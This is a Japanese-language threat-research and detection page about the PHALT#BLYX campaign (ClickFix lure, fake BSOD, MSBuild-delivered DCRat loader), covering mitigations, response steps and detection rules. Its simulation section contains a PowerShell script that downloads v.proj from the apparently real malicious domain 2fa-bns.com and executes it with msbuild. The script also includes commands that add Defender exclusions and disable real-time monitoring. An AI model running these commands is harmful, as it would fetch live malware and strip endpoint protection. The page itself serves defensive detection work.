SOC Prime Bias: 中程度

06 Jan 2026 16:06 UTC

PHALT#BLYX分析:偽のBSODとマルウェアチェーンにおける信頼されたビルドツール

Author Photo
Ruslan Mikhalov Chief of Threat Research at SOC Prime linkedin icon フォローする
PHALT#BLYX分析:偽のBSODとマルウェアチェーンにおける信頼されたビルドツール
shield icon

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query

概要

このレポートは、ホスピタリティ業界に影響を与える多段階の侵入チェーンを詳細に述べており、それは偽のBooking.comランディングページ、誤解を招くブルースクリーンスタイルのアニメーション、及びPowerShellドロッパーを実行するようにユーザーを説得するClickFixスタイルのプロンプトを組み合わせています。そのドロッパーは、MSBuildプロジェクトファイルを取得し、カスタマイズされたDCRatローダーを実行します。ローダーはWindows Defenderの改ざんを行い、スタートアップの.urlショートカットを使用して持続性をセットし、正当なプロセスにペイロードを注入します。PowerShellやMSBuild.exeのような既存のユーティリティを利用することで、オペレーターは明白なマルウェアの痕跡を減らします。また、チェーン内のロシア語のアーティファクトが帰属手がかりとして記録されています。

調査

Securonixの研究者たちは、「予約キャンセル」リンクを提供するフィッシングメールから悪意のあるドメインへ、そこからmsbuild.exeを見つけ、v.projファイルをダウンロードして実行するPowerShellのワンライナーへマッピングしました。このv.projプロジェクトは複数のアクションを実行します:Windows Defenderの除外を追加し、staxs.exe(DCRatバリアント)を取得し、持続性を持たせるスタートアップ.urlショートカットを作成し、ポート3535を介してコマンドアンドコントロールインフラストラクチャに接続します。そして、ローダーはaspnet_compiler.exeに最終ステージを圧縮して注入し、正当なアクティビティに溶け込むためにプロセスホローイングを使用します。

緩和策

ClickFixスタイルのプロンプトや「このコマンドを実行して修正する」といったソーシャルエンジニアリングを認識するためにユーザーを訓練し、MSBuild.exeの実行を監視および制限します – 特に異常なパスやユーザー駆動のワークフローから呼び出された場合。良好な可視性のためにPowerShellスクリプトブロックのロギングを有効にします。スタートアップフォルダ.urlショートカットの作成とWindows Defenderの除外修正の検出を追加します。ネットワーク層では、特定された悪意のあるドメインへのアウトバウンドトラフィックをブロックし、TCP/3535への不要な通信を厳しく制限または警告を出します。

対応

アクティビティが検出された場合、ホストを隔離してv.proj、staxs.exe、及びあらゆるStartup.urlファイルを含むキーアーティファクトを保存します。無許可のDefenderの除外を削除し、悪意のあるまたは注入されたプロセスを終了し、関連するC2ドメイン/IPをブロックします – 特にポート3535を介したあらゆる通信。潜在的に露出した資格情報をリセットし、フルマルウェアスキャンを実行し、同様のMSBuild駆動の実行とPowerShellコマンドのパターンの環境をスコープします。最終的には、MSBuildの悪用、ClickFixの振る舞い、スタートアップショートカットを通じた持続性に焦点を当てた脅威インテル情報に基づく検出をデプロイし、再発を防ぎます。

攻撃フロー

検出

Powershell を介したダウンロードまたはアップロード (cmdline 経由)

SOC Primeチーム
2026年1月6日

Windows Defender設定の疑わしい変更 (powershell経由)

SOC Primeチーム
2026年1月6日

持続性の可能性のあるポイント [ASEP – ソフトウェア/NTUSERハイブ] (registry_event経由)

SOC Primeチーム
2026年1月6日

自動起動位置における疑わしいバイナリ/スクリプト (file_event経由)

SOC Primeチーム
2026年1月6日

検出するためのIOC (HashSha512): PHALT#BLYXを分析する: 偽のBSODと信頼されたビルドツールがどのように使用されているか

SOCプライムAIルール
2026年1月6日

検出するためのIOC (SourceIP): PHALT#BLYXを分析する: 偽のBSODと信頼されたビルドツールがどのように使用されているか

SOCプライムAIルール
2026年1月6日

検出するためのIOC (HashSha256): PHALT#BLYXを分析する: 偽のBSODと信頼されたビルドツールがどのように使用されているか

SOCプライムAIルール
2026年1月6日

検出するためのIOC (DestinationIP): PHALT#BLYXを分析する: 偽のBSODと信頼されたビルドツールがどのように使用されているか

SOCプライムAIルール
2026年1月6日

PHALT#BLYX 悪意のあるペイロードの実行 MSBuildとプロセスホローイングを使用 [Windowsプロセスの作成]

SOCプライムAIルール
2026年1月6日

PHALT#BLYX マルウェアキャンペーン PowerShellとMSBuildを使用した感染 [Windows PowerShell]

SOCプライムAIルール
2026年1月6日

シミュレーションの実行

前提条件: テレメトリ & ベースラインのプリフライトチェック合格済み。

根拠: このセクションは、敵の技術戦術 (TTP) の正確な実行を詳細に示しており、検出規則をトリガーするように設計されています。コマンドとナラティブは特定されたTTPを直接反映し、検出ロジックによって期待される正確なテレメトリを生成することを目的としています。

  • 攻撃のナラティブ & コマンド:
    攻撃者は侵害されたエンドポイントでPowerShellセッションを開きます。彼らは最初にシステムの msbuild.exe バイナリを見つけ、v.projという悪意のあるMSBuildプロジェクトを C:ProgramDataにダウンロードします。攻撃者は直ちに msbuild.exe を呼び出し、ペイロードを実行し、次のステージをドロップします。最後に、Windows Defenderを改ざんし、持続性を確保するために除外を追加し、リアルタイムモニタリングを無効にします。

  • リグレッションテストスクリプト:

    # PHALT#BLYX シミュレーションスクリプト - 検出をトリガーするアクティビティを再現
    # --------------------------------------------------------------
    # 1. msbuild.exeを探します
    $msb = (Get-ChildItem -Path C: -Filter msbuild.exe -Recurse -ErrorAction SilentlyContinue | Select-Object -First 1).FullName
    
    # 2. 悪意のあるMSBuildプロジェクトをProgramDataにダウンロードします
    $projUrl = "https://2fa-bns.com/v.proj"
    $dest    = "$env:ProgramDatav.proj"
    Invoke-WebRequest -Uri $projUrl -OutFile $dest
    
    # 3. プロジェクトをmsbuild.exeで実行します
    & $msb $dest
    
    # 4. Windows Defenderの設定を変更します (以下のいずれかがルールを満たします)
    #    攻撃者の行動をシミュレートするために希望の行をアンコメントします。
    
    # 除外パスを追加
    # Add-MpPreference -ExclusionPath "$env:ProgramData"
    
    # .exeファイルの除外を追加
    # Add-MpPreference -ExclusionExtension ".exe"
    
    # .ps1ファイルの除外を追加
    # Add-MpPreference -ExclusionExtension ".ps1"
    
    # リアルタイム監視を無効にする
    # Set-MpPreference -DisableRealtimeMonitoring $true
  • クリーンアップコマンド:

    # ドロップされたプロジェクトファイルを削除
    Remove-Item -Path "$env:ProgramDatav.proj" -Force -ErrorAction SilentlyContinue
    
    # Windows Defenderのリアルタイム監視を復元 (無効化されている場合)
    Set-MpPreference -DisableRealtimeMonitoring $false
    
    # 追加した除外を削除 (パス除外例)
    Remove-MpPreference -ExclusionPath "$env:ProgramData"
    
    # ペイロードによって作成された残存ファイルを任意で削除
    # Remove-Item -Path "C:ProgramDatamalicious_payload.exe" -Force -ErrorAction SilentlyContinue